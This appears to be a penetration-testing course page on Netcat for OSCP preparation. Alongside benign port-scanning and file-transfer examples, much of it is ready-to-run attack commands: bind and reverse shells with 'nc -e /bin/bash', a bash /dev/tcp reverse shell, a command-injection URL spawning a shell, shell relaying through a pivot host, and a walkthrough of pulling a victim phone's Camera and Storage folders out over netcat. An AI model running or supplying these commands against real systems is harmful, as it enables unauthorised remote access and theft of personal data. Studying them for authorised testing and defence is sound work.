Spider Security

Netcat

  • Connecting to TCP/UDP Port

We can use client mode to connect to any TCP/UDP port, allowing us to:

  • Check if a port is open or closed.

• Read a banner from the service listening on a port.

• Connect to a network service manually.

Netcat

Netcat first released in 1995(!) by Hobbit is one of the “original” network penetration testing tools and is so versatile that it lives up to the author’s designation as a hacker’s “Swiss army knife”. The clearest definition of Netcat is from Hobbit himself: a simple “utility which reads and writes data across network connections, using TCP or UDP protocols

OK!

in the Victim Write this

nc -nvlp <PORT>

In the Attacker

nc -nv <IP> <PORT>

Chatting using nc

nc -nvlp 4444 // on the server

-n stands for "numeric-only", which prevents nc from attempting to resolve hostnames to IP addresses.

-v stands for "verbose", which causes nc to print more detailed output.

-l stands for "listen", which causes nc to listen on the specified port for incoming connections.

-p stands for "port", which specifies the port number to listen on.

nc -nv 10.0.2.10 4444 on the client to make a connection with the server

The netcat tool supports some protocols, but it works mainly on the TCP protocol. If you want to choose a different protocol, you must specify the type of protocol through switches.

-t (TCP) -> To use TCP instead of the default.

-u (UDP) -> To Use UDP Protocol

There are some other protocols, such as RAW and others, and I will leave it to you to search for that

--

Bind shell

nc -nvlp 4444 -e /bin/bash ⇒ on the victim machine

nc -nv 10.0.2.10 4444 ⇒ on attacker machine to connect with the victim machine

Reverse Shell

nc -nvlp 4444 ⇒ on attacker machine

nc -nv 10.0.2.9 4444 -e /bin/bash ⇒ on victim machine

netcat is a powerful tool often used in the OSCP (Offensive Security Certified Professional) exam for various purposes, such as setting up reverse shells, file transfers, port scanning, and even setting up a simple web server. Here are some common netcat use cases that are particularly relevant for the OSCP:

1. Reverse Shells

A reverse shell is a shell session initiated by the target machine to the attacker's machine. This is often used to bypass firewalls and NAT.

On the Attacker's Machine (Listening):

nc -lvnp 4444

On the Target Machine (Connecting Back):

nc -e /bin/bash <attacker_ip> 4444

For Windows targets:

nc.exe -e cmd.exe <attacker_ip> 4444

2. Bind Shells

A bind shell is a shell session where the target machine opens a listening port and waits for an attacker to connect to it.

On the Target Machine (Listening):

nc -lvnp 4444 -e /bin/bash

For Windows targets:

nc.exe -lvnp 4444 -e cmd.exe

On the Attacker's Machine (Connecting):

nc <target_ip> 4444

3. File Transfer

netcat can be used to transfer files between the attacker and the target machine.

On the Receiving Machine:

nc -lvnp 4444 > received_file

On the Sending Machine:

nc <receiver_ip> 4444 < file_to_send

and use Watch to watch transferring

watch -n 0.1 -d ls -la

Advanced: If we want to download a folder, for example, that contains a lot of data Or Information's , in reality we will not be able to transfer it in the same way.

There are many ways, but I will Just One Way Using Netcat

1. Netcat

You Will Compress The File And Then Transfer The Compressed File Which Holds A Lot Of Data

I've turned on Netcat From My Termux In My Phone I brought the shell using the methods we learned above , Now let's see the contents of this Camera folder

tar -cvzf cam.zip Camera

In Attacker Machine After Bring control Using Termux Open New Session Using Netcat

ncat -lnvp 8080 < cam.zip

And In Same Attacker Machine , Open New Tap And Get File Zip

Then unzip it and all the data has been simply brought into one compressed file

You can use the same idea in an external path to retrieve the largest number of information, files and folders from the victim’s device

-- Such a folder is located inside a main folder named Storage What if I discussed the same idea?

You will have all this information at your fingertips:

4. Port Scanning

netcat can be used to scan for open ports on a target machine.

nc -zv <target_ip> 20-100

5. Banner Grabbing

To gather information about services running on open ports.

nc <target_ip> 80

You can then type something like HEAD / HTTP/1.1 and press Enter twice to get the HTTP headers.

6. Setting Up a Simple Web Server

You can use netcat to serve a single HTTP response.

Simple HTTP Server:

Create a simple HTML file (index.html):

<!DOCTYPE html>
<html>
<body>
<h1>Hello, OSCP!</h1>
</body>
</html>

Serve the file with netcat:

while true; do { echo -e 'HTTP/1.1 200 OK\r\n'; cat index.html; } | nc -lvnp 8080; done

7. Port Forwarding

You can forward traffic from one port to another using netcat.

mkfifo /tmp/f; nc -lvnp 8080 < /tmp/f | nc <target_ip> 80 > /tmp/f

Practical Examples in OSCP

Example 1: Reverse Shell via a Vulnerable Web Application

Assume you have identified a vulnerable web application that allows you to execute commands. You could use the following command to get a reverse shell:

curl http://victim.com/vulnerable?cmd=nc -e /bin/bash <attacker_ip> 4444

Example 2: Privilege Escalation via File Transfer

You have gained limited access to a target machine and found a privilege escalation exploit that you need to upload. On your machine:

nc -lvnp 4444 < exploit.c

On the target machine:

nc <attacker_ip> 4444 > exploit.c

Example 3: Scanning for Open Ports During Reconnaissance

Use netcat to quickly check for open ports on a target machine:

nc -zv 192.168.1.5 1-65535

Example 4: Bind Shell for Post-Exploitation

You have exploited a service and want to maintain access:

On the target machine:

nc -lvnp 4444 -e /bin/bash

On your machine:

nc <target_ip> 4444

By mastering these netcat commands and understanding how to use them in various scenarios, you can greatly enhance your efficiency and effectiveness during the OSCP exam. Always remember to follow the ethical guidelines and legal boundaries when using these techniques.

Reverse shell without Netcat on the target host

One major downside on the shown example is that you need Netcat on that target host which is very often not the case in real world scenario’s. In some cases Netcat is present, or we have a way to install it, but in many cases we need to use alternatives ways to connect back to the attack box. Let’s have a look at a few alternative ways to setup a reverse shell.

Bash reverse shell

With can also use Bash to initiate a reverse shell from the target host to the attack box by using the following command:

bash -i >& /dev/tcp/192.168.100.113/4444 0>&1

Advenced Usage (Relay)

We will explain it with a simple example:

We have three devices A , B , C Device A He can't see it Device C But , Device B Can See Device C , And Device A

So .. In Case Device C Send CMD To Device B In Port 8080 , And Device B Can See Device A , U Can Send Malware To Connect Or Forward Connection From Device B To Device A

A -> 192.168.1.2 (Attacker)

B -> 192.168.2.5 (Server)

C -> 192.168.2.3 (Victim)

Device_A# nc -lnvp 22

Device_B# nc -lnvp 8080 | nc 192.168.1.2 22

Device_C# nc 192.168.2.5 8080 -e /bin/bash
PreviousModule 4 (Practical Tools)NextSocat

Last updated